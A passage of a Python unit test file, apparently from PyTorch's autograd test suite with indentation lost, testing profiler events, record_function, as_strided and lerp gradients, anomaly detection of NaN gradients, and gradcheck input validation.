avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
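# The two events last 5us and 10us (15us total); add(avg) then doubles everything,
# hence count 4, cpu_time_total 30us and an average cpu_time of 30 / 4 = 7.5us.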
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
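# Each entry lists the recorded input shapes of one aten::linear call in argument
# order (input, weight, bias): e.g. [128, 20], [30, 20], [30] for Linear(20, 30).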
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # convert to microseconds, which is the profiler default
print(
"Total time based on python measurements: ",
format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary functions
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_as_strided(self):
def test(x, prepro_fn, size, strides, offset=None):
x = x.to(torch.double).detach().requires_grad_()
# Check that forward will **not** resize storage because it may
# cause NaN in output and consequently fail the numerical Jacobian check
with torch.no_grad():
y = prepro_fn(x) if prepro_fn is not None else x
max_offset = sum((si - 1) * st for si, st in zip(size, strides))
max_offset += offset if offset is not None else y.storage_offset()
assert max_offset < len(y.storage()), "test case resizes storage"
def closure(x):
if prepro_fn is not None:
x = prepro_fn(x)
return x.as_strided(size, strides, offset)
gradcheck(closure, [x])
gradgradcheck(closure, [x])
# basic case
test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
# test crazy stride at dim with size 1 case
test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
# test expand case
test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
# test non-expand overlapping case
test(torch.randn(35), None, [6, 6], [5, 1], 2)
test(torch.randn(15), None, [3, 2], [3, 6], 2)
# test transpose case
test(torch.randn(3, 4), None, [4, 3], [1, 4])
# test "getting things outside the input" case
x = torch.randn(6, 2)
test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros
self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
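# x[3:] shares x's storage with a storage offset of 6, and as_strided's offset is
# relative to the start of the storage, so offset 0 views x[:3] instead; the output
# doesn't depend on x[3:]'s own elements, hence its gradient is all zeros.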
# test select on expanded input case
test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this because diagonal_backward uses in-place
# operations and gradgradcheck does not catch whether
# they work as expected (it will succeed even if
# the gradient has requires_grad == False)
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't turn the warnings into errors when there is already an error,
# but we'd at least want to see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that the PyObject is destroyed when grad goes out of scope at the end of this function.
# We can test this by checking that Foo is not kept alive once t is destroyed.
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still need test_anomaly_assign_parent_cleanup,
# since if the PyObject were not destroyed here, wouldn't this test detect that as well?
# The answer is that the custom function's PyObject (THPFunction) actually only holds
# a weak reference to the C++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contiguous indices and values
# and return it as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# With non-contiguous indices and values, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn (aka has strides) and input has a dimension with stride 0. (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when inputs are mkldnn, forward mode testing is not allowed
# Tolerances below are relaxed to make sure the gradients match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while computing batched grad (big error message)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
